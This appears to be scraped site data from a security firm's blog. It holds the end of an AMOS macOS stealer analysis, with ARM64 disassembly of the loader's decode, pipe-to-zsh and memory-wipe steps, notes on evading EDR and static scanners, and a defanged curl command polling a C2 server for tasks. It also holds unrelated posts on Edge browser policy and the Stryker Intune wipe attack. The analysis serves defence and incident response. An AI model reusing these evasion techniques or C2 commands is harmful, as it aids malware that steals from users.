execution of the same payload produces a different sequence of ",[2499,4312,4313],{},"write()"," syscall sizes.",[809,4316,4317,4318,4320],{},"The 1-microsecond ",[2499,4319,3027],{}," between chunks serves a secondary purpose: it yields the CPU between writes, keeping the process's CPU utilisation flat and avoiding a sudden spike that a behavioural EDR rule might flag as anomalous burst I/O.",[897,4322,4324],{"id":4323},"step-4-immediate-memory-wipe","Step 4: Immediate memory wipe",[809,4326,2624],{},[2489,4328,4329],{"style":2491},[2493,4330,4333],{"className":4331,"code":4332,"language":987},[2496],"; After all chunks written and pipe closed:\n100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type\n100000a24:  sxtb w9,w8\n100000a28:  ldp x10,x11,[x19]\n100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer\n100000a34:  csel x1,x11,x8,lt      ; length of buffer\n100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)\n",[2499,4334,4332],{"__ignoreMap":927},[809,4336,1962,4337,4340],{},[2499,4338,4339],{},"_bzero()"," call zeroes the entire decrypted payload buffer immediately after the last byte has been written to the pipe. There is no point in time, not even a microsecond, where the decrypted payload exists in memory after execution is complete. A live memory dump taken the instant after this function returns will find only zeroes where the payload was.",[809,4342,4343,4344,4347],{},"This is called ",[1655,4345,4346],{},"zero-after-use"," and is the same technique used in high-assurance cryptographic libraries to prevent secret key material from persisting in memory. Seeing it in commodity malware is unusual and indicates a developer with a security engineering background.",[897,4349,4351],{"id":4350},"the-complete-execution-sequence","The complete execution sequence:",[809,4353,2624],{},[2489,4355,4356],{"style":2491},[2493,4357,4360],{"className":4358,"code":4359,"language":987},[2496],"__cstring:  \"\\x01LG@\\x01T]F\"   (7 bytes, obfuscated)\n    ↓  SIMD XOR with 0x2e (8-wide vector)\nstack:      \"/bin/zsh\\0\"         (decoded in-place, stack only)\n    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]\n    ↓  _fork()\n    │\n    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end\n    │          _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n    │          → /bin/zsh reads commands from stdin (= pipe)\n    │\n    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n                     _usleep(1)\n               _close(local_5c)    close write end → EOF to shell\n               _bzero(payload, len) ← WIPE IMMEDIATELY\n               _waitpid(child, ...)\n",[2499,4361,4359],{"__ignoreMap":927},[819,4363,4365],{"id":4364},"the-import-table-as-a-weapon","The Import Table as a Weapon",[809,4367,2484],{},[809,4369,4370],{},"The complete import table of this binary is:",[2489,4372,4373],{"style":2491},[2493,4374,4377],{"className":4375,"code":4376,"language":987},[2496],"// C runtime / memory\n_memcpy       _memmove      _memset       _bzero\n\n// Process execution\n_fork         _execvp       _execl        __exit\n\n// IPC / pipes\n_pipe         _dup2         _close        _write\n\n// Synchronisation\n_waitpid      _usleep\n\n// Stack protection\n___stack_chk_fail    ___stack_chk_guard\n\n// C++ runtime\noperator.new    operator.delete    __Unwind_Resume\n___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch\n___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0\nterminate    logic_error    bad_array_new_length    __next_prime\n\n// STL containers\nappend    reserve    push_back    operator=\n\n// Dynamic linking\ndyld_stub_binder\n",[2499,4378,4376],{"__ignoreMap":927},[809,4380,4381],{},"The total import count is 27 symbols. What is missing is as significant as what is present.",[897,4383,4385],{"id":4384},"absent-networking","Absent — networking:",[809,4387,2624],{},[2489,4389,4390],{"style":2491},[2493,4391,4394],{"className":4392,"code":4393,"language":987},[2496],"socket      connect     bind        listen\naccept      send        recv        sendto\nrecvfrom    getaddrinfo gethostbyname\n",[2499,4395,4393],{"__ignoreMap":927},[897,4397,4399],{"id":4398},"absent-file-system","Absent — file system:",[809,4401,2624],{},[2489,4403,4404],{"style":2491},[2493,4405,4408],{"className":4406,"code":4407,"language":987},[2496],"open        read        fopen       fread\nfwrite      fclose      stat        unlink\nmkdir       rename      opendir     readdir\n",[2499,4409,4407],{"__ignoreMap":927},[897,4411,4413],{"id":4412},"absent-process-introspection","Absent — process introspection:",[809,4415,2624],{},[2489,4417,4418],{"style":2491},[2493,4419,4422],{"className":4420,"code":4421,"language":987},[2496],"getpid      getuid      getenv      sysctl\n",[2499,4423,4421],{"__ignoreMap":927},[897,4425,4427],{"id":4426},"absent-cryptography","Absent: Cryptography",[809,4429,2484],{},[2489,4431,4432],{"style":2491},[2493,4433,4436],{"className":4434,"code":4435,"language":987},[2496],"CCCrypt     SecItemAdd  SecKeychainFind\n",[2499,4437,4435],{"__ignoreMap":927},[809,4439,4440,4441,883,4444,4447,4448,883,4451,4454,4455,4457],{},"In a traditional malware sample, you expect to see imports for networking (",[2499,4442,4443],{},"socket",[2499,4445,4446],{},"connect",") or file manipulation (",[2499,4449,4450],{},"fopen",[2499,4452,4453],{},"write","). This binary has ",[1655,4456,2189],{},". To a standard scanner, this binary looks like a harmless process launcher. This is a deliberate architectural choice to bypass static analysis tools that flag suspicious API usage.",[809,4459,1962,4460,4462],{},[2499,4461,2831],{}," binary does not perform the theft itself. Its sole purpose is to drop and execute the real malicious payload: a heavily obfuscated AppleScript. A standalone EDR or AV looking for \"malicious binaries\" will see a loader with no network or file I/O capabilities and potentially grant it a \"clean\" verdict. It misses the fact that the binary is a specialized delivery system for a high-level script payload.",[2462,4464],{},[1938,4466,4468],{"id":4467},"the-backdoor","The Backdoor",[809,4470,825],{},[809,4472,4473,4474,4477],{},"The incident did not end after the initial compromise. Microsoft Defender telemetry showed a process running from ",[2499,4475,4476],{},"/Users/\u003Credacted>/.mainhelper",", polling an external server:",[2489,4479,4480],{"style":2491},[2493,4481,4483],{"className":2693,"code":4482,"language":2695,"meta":927,"style":927},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[2499,4484,4485],{"__ignoreMap":927},[919,4486,4487,4490,4492],{"class":2538,"line":2539},[919,4488,4489],{"class":2702},"sh",[919,4491,2707],{"class":2706},[919,4493,4494],{"class":2720}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[809,4496,4497],{},"The Base64 string decodes to a 16-byte device UUID, the unique identifier assigned to this machine by the attacker's C2 infrastructure on the day of the initial infection.",[809,4499,1962,4500,4503,4504,4507,4508,4510],{},[2499,4501,4502],{},".mainhelper"," binary (SHA-256: ",[2499,4505,4506],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",") had been installed by the osascript dropper via ",[2499,4509,2703],{}," on the day of the incident.",[2462,4512],{},[1938,4514,4516],{"id":4515},"the-power-of-the-collective-shield-our-exclusive-shared-threat-intelligence-platform","The Power of the Collective Shield: Our Exclusive Shared Threat Intelligence Platform",[809,4518,825],{},[809,4520,4521],{},"When an alert fires in our SOC, the clock doesn't just start for the affected customer, it starts for every organization under the glueckkanja shield. This investigation into a previously undocumented AMOS variant highlights the critical nature of the intelligence gap: that dangerous window where traditional vendors are blind because they haven't seen the threat yet.",[809,4523,4524],{},"This is where our proprietary Shared Threat Intelligence Platform, developed exclusively for our glueckkanja CSOC customers, proves its decisive worth. We don't wait for industry updates; we create them. While our analysts were still dismantling the final layers of the ARM64 assembly, our Automated Orchestration Engine was already distributing the extracted indicators across our entire ecosystem. This creates an immediate herd immunity effect, where a discovery at a single endpoint becomes a blocked threat for every organization we protect within minutes.",[809,4526,4527],{},"Reactive security is a relic of the past when facing threats designed to slip through the cracks of conventional defenses. The answer lies in combining human expertise with an architecture that can deploy that knowledge instantly and at scale. When these insights are channeled through our shared intelligence model, the attacker's time advantage can be transformed into a liability, protecting our customers even before a threat is recognized by the wider industry.",[2462,4529],{},[892,4531,4532,4537,4540,4543],{},[809,4533,4534],{},[1655,4535,4536],{},"Note on Data Privacy",[809,4538,4539],{},"Identifying information has been anonymised in this publication. Specific technical details, indicators, and timestamps may have been slightly altered to ensure the continued protection of the affected environment while maintaining the full technical integrity of the analysis.",[809,4541,4542],{},"The technical analysis and indicators of compromise (IOCs) provided in this report are for illustrative and educational purposes only. This information is provided on a \"best effort\" basis. glueckkanja AG makes no warranties, express or implied, regarding the completeness or accuracy of the data and shall not be held liable for any damages, losses, or security incidents resulting from the use or implementation of the information, rules, or signatures shared herein. Users are strongly advised to validate all indicators and rules in a controlled environment before deployment.",[809,4544,4545],{},"Indicators and techniques described may overlap with known malware families and are not exclusive to a single campaign.",[4547,4548,4549],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":927,"searchDepth":928,"depth":928,"links":4551},[4552,4553,4554,4555,4562,4563,4564,4565,4573,4580],{"id":2480,"depth":928,"text":2481},{"id":2520,"depth":928,"text":2521},{"id":2579,"depth":928,"text":2580},{"id":2611,"depth":928,"text":2612,"children":4556},[4557,4558,4559,4560,4561],{"id":2620,"depth":935,"text":2621},{"id":2635,"depth":935,"text":2636},{"id":2649,"depth":935,"text":2650},{"id":2658,"depth":935,"text":2659},{"id":2675,"depth":935,"text":2676},{"id":2838,"depth":928,"text":2839},{"id":2927,"depth":928,"text":2928},{"id":3042,"depth":928,"text":3043},{"id":3113,"depth":928,"text":3114,"children":4566},[4567,4568,4569,4570,4571,4572],{"id":3128,"depth":935,"text":3129},{"id":3415,"depth":935,"text":3416},{"id":3670,"depth":935,"text":3671},{"id":3862,"depth":935,"text":3863},{"id":3949,"depth":935,"text":3950},{"id":4102,"depth":935,"text":4103},{"id":4156,"depth":928,"text":4157,"children":4574},[4575,4576,4577,4578,4579],{"id":4172,"depth":935,"text":4173},{"id":4239,"depth":935,"text":4240},{"id":4281,"depth":935,"text":4282},{"id":4323,"depth":935,"text":4324},{"id":4350,"depth":935,"text":4351},{"id":4364,"depth":928,"text":4365,"children":4581},[4582,4583,4584,4585],{"id":4384,"depth":935,"text":4385},{"id":4398,"depth":935,"text":4399},{"id":4412,"depth":935,"text":4413},{"id":4426,"depth":935,"text":4427},{"lang":940,"seoTitle":4587,"titleClass":942,"date":4588,"categories":4589,"blogtitlepic":4590,"socialimg":4591,"customExcerpt":4592,"keywords":4593,"maxContent":511,"asideNav":4594,"footer":4610,"contactInContent":4611,"published":511,"hreflang":4634},"AMOS Stealer Variant: Reverse Engineering an Unknown macOS Malware — Incident to Intelligence","2026-04-10",[373],"head-amos-stealer.png","/blog/heads/head-amos-stealer.png","A previously undocumented AMOS stealer variant compromised a macOS endpoint. No known hashes, no C2 data in any public database. Our SOC dismantled six layers of obfuscation, extracted every indicator, and pushed protection to all SOC customers within hours, before the wider industry had even seen the sample.","AMOS stealer, macOS malware, reverse engineering, malware analysis, Ghidra, ARM64, incident response, threat intelligence, CSOC, macOS security, stealer malware, shared threat intelligence, atomic macOS stealer",{"menuItems":4595},[4596,4599,4602,4605,4607],{"href":4597,"text":4598},"#the-incident-a-unknown-ioc-scenario","The Incident",{"href":4600,"text":4601},"#stage-1-sandbox-checks","Stage 1: Sandbox Checks",{"href":4603,"text":4604},"#stage-2-reverse-engineering-the-helper-binary","Stage 2: Binary Analysis",{"href":4606,"text":4468},"#the-backdoor",{"href":4608,"text":4609},"#the-power-of-the-collective-shield-our-exclusive-shared-threat-intelligence-platform","Shared Threat Intelligence",{"noMargin":511},{"quote":511,"infos":4612},{"bgColor":952,"headline":2303,"subline":4613,"level":819,"textStyling":956,"flush":957,"person":4614,"form":4616},"Want to know how our Shared Threat Intelligence Platform protects you from unknown malware variants before the industry even knows they exist? Let's talk.",{"image":1895,"cloudinary":511,"alt":960,"name":961,"quotee":961,"quoteeTitle":962,"quote":4615},"The dangerous thing about this variant wasn't the technical complexity, impressive as it is. The dangerous thing was the time window. Without Shared Threat Intelligence, our other customers would have been exposed for hours while we were still analyzing.",{"ctaText":976,"cta":4617,"method":938,"action":979,"fields":4618},{"skin":978},[4619,4620,4621,4622,4623,4625,4627,4628,4629,4631,4632,4633],{"type":982,"id":983,"value":984},{"label":986,"type":987,"id":988,"required":511,"requiredMsg":989},{"label":991,"type":987,"id":615,"required":511,"requiredMsg":992},{"label":994,"type":995,"id":995,"required":511,"requiredMsg":996},{"label":4624,"type":999,"id":1000,"required":752,"requiredMsg":1001},"Your message",{"label":4626,"type":1004,"id":1005,"required":511,"requiredMsg":1006},"Your data will be stored with us for the purpose of processing and responding to your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":982,"id":1008,"value":373},{"type":982,"id":1010,"value":2327},{"type":982,"id":1013,"value":4630},"Form: Blog AMOS Stealer CSOC | EN",{"type":982,"id":1016,"value":1017},{"type":982,"id":1019},{"type":982,"id":1021},[4635,4637,4639],{"lang":940,"href":4636},"/en/posts/2026-04-10-incident-to-intelligence",{"lang":4,"href":4638},"/de/posts/2026-04-10-incident-to-intelligence",{"lang":1028,"href":4640},"/es/posts/2026-04-10-incident-to-intelligence","/posts/2026-04-10-incident-to-intelligence",{"title":2448,"description":2454},"posts/2026-04-10-incident-to-intelligence",[4645,4646,4647,4648,4649],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations Center","xU2OqTCD0VYp9tkwjqx-vgUtRHKfEnVl-RzD93uv5Z0",{"id":4652,"title":4653,"author":4654,"body":4655,"cta":767,"description":4659,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":4845,"moment":4847,"navigation":511,"path":4876,"seo":4877,"stem":4878,"tags":767,"webcast":752,"__hash__":4879},"content_en/posts/2026-03-21-microsoft-edge-corporate-browser.md","Why Edge Should Be Your Only Corporate Browser",[1094],{"type":806,"value":4656,"toc":4837},[4657,4660,4662,4664,4670,4674,4676,4679,4683,4685,4688,4702,4706,4708,4714,4720,4723,4766,4774,4778,4780,4788,4799,4803,4805,4808,4834],[809,4658,4659],{},"In today's enterprise environments, choosing the right browser is more than a matter of preference. It's a strategic decision that impacts security, manageability, and user productivity. While Google Chrome has long been a popular choice, Microsoft Edge has evolved into an enterprise-ready browser that offers compelling advantages, especially when using Microsoft 365 and managed through Microsoft Intune.",[819,4661,373],{"id":370},[809,4663,825],{},[809,4665,4666,4667,4669],{},"Using a managed Microsoft Edge browser ensures that security features are consistently enforced across all endpoints. With native integration into Microsoft Defender SmartScreen, Edge provides protection against phishing, malware, and other threats. When deployed via Intune, policies can tightly control behavior, block risky extensions, and enforce safe browsing practices. glueckkanja's ",[813,4668,45],{"href":48}," offers up-to-date Edge policies aligned with Microsoft's Security baselines.",[819,4671,4673],{"id":4672},"synchronization-with-entra-id-account","Synchronization with Entra ID Account",[809,4675,825],{},[809,4677,4678],{},"Edge supports secure synchronization of user data, such as favourites, passwords, and settings, across devices via Entra ID accounts. This is especially beneficial in hybrid work scenarios, allowing users to switch between corporate laptops, virtual desktops, and mobile devices without losing context or productivity.",[819,4680,4682],{"id":4681},"avoiding-complexity-offering-multiple-browsers-adds-overhead","Avoiding Complexity: Offering Multiple Browsers Adds Overhead",[809,4684,825],{},[809,4686,4687],{},"Supporting alternative browsers like Google Chrome in a corporate environment often requires additional infrastructure and effort:",[1648,4689,4690,4696],{"style":1650},[1652,4691,4692,4695],{},[1655,4693,4694],{},"Backup and Sync Strategies:"," Other browsers often require third-party accounts (e.g. a Google Account) to enable synchronization.",[1652,4697,4698,4701],{},[1655,4699,4700],{},"Policy Maintenance:"," Each browser requires its own set of security and configuration policies. Maintaining these across multiple platforms demands ongoing effort, increases the risk of misconfiguration, and complicates audits.",[819,4703,4705],{"id":4704},"policy-driven-chrome-redirection-via-intune","Policy-Driven Chrome Redirection via Intune",[809,4707,825],{},[809,4709,4710,4711,4713],{},"To guide users from Chrome to Edge, organizations can implement a redirection policy using Microsoft Intune — ready-to-use and implemented within minutes via glueckkanja's ",[813,4712,45],{"href":48},". Users are greeted with a landing page that highlights Microsoft Edge as the default corporate browser, along with a one-click option to launch it directly.",[809,4715,4716],{},[838,4717],{"alt":4718,"src":4719},"Microsoft Edge as the default corporate browser","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[809,4721,4722],{},"The configuration policy demonstrates how Chrome can be restricted and redirected:",[1648,4724,4725,4739,4748,4754,4760],{"style":1650},[1652,4726,4727,4730,4731,4734,4735,4738],{},[1655,4728,4729],{},"URL Allowlist:"," Only specific URLs like the landing page ",[2499,4732,4733],{},"https://edge.glueckkanja.com/"," and the moniker ",[2499,4736,4737],{},"microsoft-edge:*"," are permitted.",[1652,4740,4741,4744,4745,4747],{},[1655,4742,4743],{},"URL Blocklist:"," All other URLs are blocked (",[2499,4746,3713],{},"), effectively disabling general browsing in Chrome.",[1652,4749,4750,4753],{},[1655,4751,4752],{},"Homepage and New Tab Page:"," Both are set to the landing page that encourages users to open Microsoft Edge.",[1652,4755,4756,4759],{},[1655,4757,4758],{},"Protocol Handling:"," Chrome is configured to auto-launch Edge when clicking URLs on the landing page.",[1652,4761,4762,4765],{},[1655,4763,4764],{},"Extension Control:"," Additional settings restrict extension installation.",[809,4767,4768,4769],{},"Example policy as download: ",[813,4770,4773],{"href":4771,"rel":4772},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[1509],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[819,4775,4777],{"id":4776},"landing-page-via-github-pages","Landing Page via GitHub Pages",[809,4779,825],{},[809,4781,4782,4783],{},"The website is powered by GitHub Pages. Feel free to adjust it to your needs and contribute to the GitHub project: ",[813,4784,4787],{"href":4785,"rel":4786},"https://github.com/glueckkanja/edge-redirection-landingpage",[1509],"edge-redirection-landingpage",[809,4789,4790],{},[813,4791,4796],{"role":910,"className":4792,"dataText":4793,"href":4794,"target":516,"rel":4795,"type":917},[912,913,914,915],"See the landing page in action","https://edge.glueckkanja.com",[1662],[919,4797,4793],{"className":4798},[922],[819,4800,4802],{"id":4801},"key-takeaways","Key Takeaways",[809,4804,825],{},[809,4806,4807],{},"Microsoft Edge offers a secure, manageable browsing experience with deep integration into Microsoft 365, making it the logical choice as the default corporate browser. The key advantages:",[1648,4809,4810,4813,4816,4819,4822,4825,4828,4831],{"style":1650},[1652,4811,4812],{},"Seamless Entra ID integration (SSO)",[1652,4814,4815],{},"Cloud-based sync and backup via Microsoft 365 account across multiple platforms",[1652,4817,4818],{},"Built-in security ecosystem (Microsoft Defender SmartScreen and Microsoft Endpoint DLP)",[1652,4820,4821],{},"Intune App Protection Policy support",[1652,4823,4824],{},"Browser management via Microsoft 365 admin center and Intune",[1652,4826,4827],{},"Internet Explorer mode for legacy compatibility",[1652,4829,4830],{},"Corporate branding",[1652,4832,4833],{},"Copilot integration",[809,4835,4836],{},"Standardizing on Edge reduces complexity, strengthens security, and simplifies support. Extending the redirection approach to other common browsers is a feasible next step as well.",{"title":927,"searchDepth":928,"depth":928,"links":4838},[4839,4840,4841,4842,4843,4844],{"id":370,"depth":928,"text":373},{"id":4672,"depth":928,"text":4673},{"id":4681,"depth":928,"text":4682},{"id":4704,"depth":928,"text":4705},{"id":4776,"depth":928,"text":4777},{"id":4801,"depth":928,"text":4802},{"lang":940,"seoTitle":4846,"titleClass":942,"date":4847,"blogtitlepic":4848,"socialimg":4849,"customExcerpt":4850,"keywords":4851,"hreflang":4852,"published":511,"asideNav":4859},"Microsoft Edge as the Secured Corporate Browser: Security, Sync, and Chrome Redirection via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","The browser nobody satisfies chose became the one everybody manages. Most companies never made a deliberate decision for Chrome; it just showed up, brought its own sync logic, its own account layer, its own policy surface. Meanwhile, Microsoft Edge matured into a browser that plugs directly into the infrastructure enterprises already run: Entra ID, Intune, Defender. This post shows how to make that switch official, redirect Chrome to a landing page via Intune policy, and retire the complexity that comes with maintaining two browsers in parallel.","Microsoft Edge, corporate browser, Microsoft Intune, Entra ID, Chrome redirection, Managed Intune, browser policy, Microsoft Defender SmartScreen, enterprise browser, browser management, URL blocklist, URL allowlist",[4853,4855,4857],{"lang":4,"href":4854},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":940,"href":4856},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":1028,"href":4858},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":4860},[4861,4863,4866,4869,4872,4874],{"href":4862,"text":373},"#security",{"href":4864,"text":4865},"#synchronization-with-entra-id-account","Synchronization with Entra ID",{"href":4867,"text":4868},"#avoiding-complexity-offering-multiple-browsers-adds-overhead","Avoiding Complexity",{"href":4870,"text":4871},"#policy-driven-chrome-redirection-via-intune","Chrome Redirection via Intune",{"href":4873,"text":4777},"#landing-page-via-github-pages",{"href":4875,"text":4802},"#key-takeaways","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":4653,"description":4659},"posts/2026-03-21-microsoft-edge-corporate-browser","AsMZExVFaHmpVg3-wvTocO819mSe8A4QZIdrFls8YIw",{"id":4881,"title":4882,"author":4883,"body":4884,"cta":767,"description":4888,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":5130,"moment":5132,"navigation":511,"path":5182,"seo":5183,"stem":5184,"tags":5185,"webcast":752,"__hash__":5187},"content_en/posts/2026-03-20-stryker-attack-intune-privilege.md","No Malware Needed. Just One Admin Account.",[961],{"type":806,"value":4885,"toc":5118},[4886,4889,4892,4896,4898,4901,4904,4907,4911,4913,4916,4919,4922,4925,4929,4931,4934,4937,4941,4943,4946,4949,4952,4956,4958,4961,4967,4971,4973,4979,4982,4985,4988,4994,4997,5003,5012,5016,5018,5024,5027,5036,5039,5042,5045,5048,5051,5054,5058,5060,5063,5066,5069,5077,5080,5083,5087,5089],[809,4887,4888],{},"Wednesday, March 11, 2026. Employees at Stryker offices across 79 countries switched on their computers and found them blank. Login screens replaced by a logo. Corporate laptops, company phones, personal devices enrolled in the company's BYOD program. All wiped simultaneously, overnight. No ransomware. No malware signatures. Nothing for an endpoint detection tool to catch.",[809,4890,4891],{},"The attacker, a pro-Iranian hacktivist group named Handala, had turned Stryker's own IT management infrastructure into the weapon.",[819,4893,4895],{"id":4894},"what-actually-happened","What actually happened",[809,4897,825],{},[809,4899,4900],{},"The core of the attack was not a sophisticated exploit or a zero-day vulnerability. It was something far simpler and, frankly, far more common: an administrator account was compromised, and that account had access to Microsoft Intune.",[809,4902,4903],{},"According to reporting by BleepingComputer, roughly 80,000 devices were wiped between 5:00 and 8:00 a.m. UTC. Handala claimed the number exceeded 200,000, including servers and mobile devices across the company's global operations in 79 countries.",[809,4905,4906],{},"No custom malware. No malicious binary to detect. A living-off-the-land attack, executed entirely through a legitimate management console.",[819,4908,4910],{"id":4909},"why-this-attack-succeeded","Why this attack succeeded",[809,4912,825],{},[809,4914,4915],{},"There is a structural issue at the root of this, and it is not unique to Stryker. It is endemic across enterprises.",[809,4917,4918],{},"Most organizations treat administrative tasks and day-to-day work as activities that can comfortably coexist on the same device, under the same user identity. An IT administrator answers emails, browses the web, clicks the occasional link, and — from that same session, on that same machine — manages cloud infrastructure, approves access changes, or in this case, touches a device management console with the power to wipe the entire fleet.",[809,4920,4921],{},"This is the attack surface. When the everyday work context and the privileged administration context share a common endpoint and identity, any compromise of that endpoint is automatically a compromise of everything that identity can reach. Phishing, credential theft via infostealer malware, adversary-in-the-middle (AiTM) session token theft — all of them become a direct path to the most powerful controls in your environment. No privilege escalation needed. The attacker simply uses what's already there.",[809,4923,4924],{},"In Stryker's case, that access happened to include an Intune tenant managing devices across six continents.",[819,4926,4928],{"id":4927},"cisa-has-seen-enough","CISA has seen enough",[809,4930,825],{},[809,4932,4933],{},"The scale and brazenness of the attack prompted an unusual response: CISA, the U.S. Cybersecurity and Infrastructure Security Agency, issued guidance directly addressing the risk of compromised device management platforms. The agency confirmed it was aware of the attack vector and urged organizations to take concrete action, ensuring that high-impact Intune functions like device wipes require a second administrator's approval before executing.",[809,4935,4936],{},"This is a rare and significant signal. When a federal security agency issues targeted guidance in the immediate aftermath of a specific incident, the message is clear: this is not an edge case. This is a pattern, and other organizations are likely running the same exposure.",[819,4938,4940],{"id":4939},"separation-is-not-a-luxury-it-is-the-control","Separation is not a luxury. It is the control.",[809,4942,825],{},[809,4944,4945],{},"The Stryker attack is a useful case study precisely because it illustrates the blast radius of a flat privilege model. The attacker did not need to escalate privileges through a chain of vulnerabilities. They gained access to credentials, or a session token, at one level and found that level was already sufficient to cause catastrophic, global, irreversible damage.",[809,4947,4948],{},"The architectural answer to this problem has a name: the Microsoft Enterprise Access Model (EAM). Its core principle is tiered administration: privileged operations are performed using dedicated accounts and dedicated devices, strictly separated from the everyday work context. This least-privilege approach means that a compromised productivity account cannot reach the management plane, and a compromised management account cannot reach control-plane operations. This applies equally to cloud-only environments and hybrid setups including on-premises reach-back to Active Directory via Entra ID, where a single over-privileged account can still bridge the cloud and the domain.",[809,4950,4951],{},"The idea is straightforward. Administrative work happens on administrative devices. The identity used to manage your Microsoft 365 tenant, your Intune environment, your Azure infrastructure, is never the same identity used to read email or attend Teams calls. The device used for those administrative sessions is hardened, restricted, and isolated from the regular internet browsing and productivity context that creates exposure. Lateral movement becomes structurally harder because there is no lateral path.",[819,4953,4955],{"id":4954},"two-layers-of-defense","Two layers of defense",[809,4957,825],{},[809,4959,4960],{},"Addressing this threat model properly requires working at two levels simultaneously: securing who can touch your management plane and its credentials, and hardening how that management plane itself is configured and operated. These are not the same problem, and both matter.",[809,4962,4963],{},[838,4964],{"alt":4965,"src":4966},"Risk and product mapping for the Stryker attack scenario: Managed Red Tenant addresses identity and access risks, Managed Intune addresses endpoint management risks","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[897,4968,4970],{"id":4969},"managed-red-tenant-protecting-the-administrative-context","Managed Red Tenant: protecting the administrative context",[809,4972,2484],{},[809,4974,4975,4976,4978],{},"The first layer is isolating privileged access entirely. This is what our ",[813,4977,396],{"href":399}," is built for.",[809,4980,4981],{},"The Managed Red Tenant provides a fully isolated, cloud-based administrative environment, a dedicated Microsoft Entra tenant (\"the Red Tenant\") used exclusively for privileged operations. Administrative identities live here. Administrative devices are managed here. Nothing from the regular work environment bleeds across.",[809,4983,4984],{},"For the most critical roles, those with Control Plane access, like Global Administrators, we implement the \"Clean Keyboard\" approach: a physical Privileged Admin Workstation (PAW) with dedicated hardware, hardened policies, and no exposure to the everyday work context whatsoever. For broader administrative roles, we offer scalable Virtual Access Workstations (VAW) built on a hardened Azure Virtual Desktop infrastructure within the Red Tenant. The access path itself is protected through Microsoft Entra Private Access, applying Zero Trust Network Access and Conditional Access policies before any session can be established.",[809,4986,4987],{},"Microsoft Entra Internet Access blocks public internet access from administrative sessions and restricts connectivity strictly to privileged interfaces and authorized tenant environments. Near real-time session revocation is possible through Universal Conditional Access Evaluation, meaning a revoked credential doesn't linger as a valid session.",[809,4989,4990,4991,4993],{},"The Managed Red Tenant is monitored 24/7 by our ",[813,4992,1621],{"href":428},", with custom-developed detections built specifically around administrative permissions and access patterns. An attacker who somehow compromised a credential in this environment would not get three undetected hours to execute wipe commands across a global fleet.",[809,4995,4996],{},"This matters particularly for roles like Intune administrators. They know how to secure clients, but securing a privileged admin workstation requires a different set of skills — enterprise access architecture, identity hardening, Zero Trust controls — that typically sits with the security team. A Managed Red Tenant removes that burden entirely: Intune admins get a professionally managed, consistently hardened workstation without needing to become security workstation experts themselves. The same applies to any highly privileged role across the organization.",[4998,4999],"video-frame",{"thumb":5000,"alt":5001,"id":5002,":full-width":2391},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer and Thomas Naunheim discussing Managed Red Tenant cybersecurity strategy","rOEIvItNkjE",[2489,5004,5006,5007],{"style":5005},"background:var(--color-gk-light-grey); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-gk-dark-blue)","More on our ",[813,5008,5011],{"href":5009,"target":516,"rel":5010},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[1662],"YouTube channel",[897,5013,5015],{"id":5014},"managed-intune-locking-down-the-management-plane-itself","Managed Intune: locking down the management plane itself",[809,5017,2484],{},[809,5019,5020,5021,5023],{},"The second layer is ensuring that Intune, the very tool that was weaponized in the Stryker attack, is configured, operated, and continuously maintained to the highest security standard. This is where our ",[813,5022,45],{"href":48}," service comes in.",[809,5025,5026],{},"One of the core findings from incidents like Stryker is that organizations often inherit Intune environments that have grown organically over time: Policies stacked on top of policies, manual changes made through the portal that are difficult to audit, and security baselines that have not kept pace with Microsoft's own evolving recommendations. That kind of environment is exactly where configuration drift creates 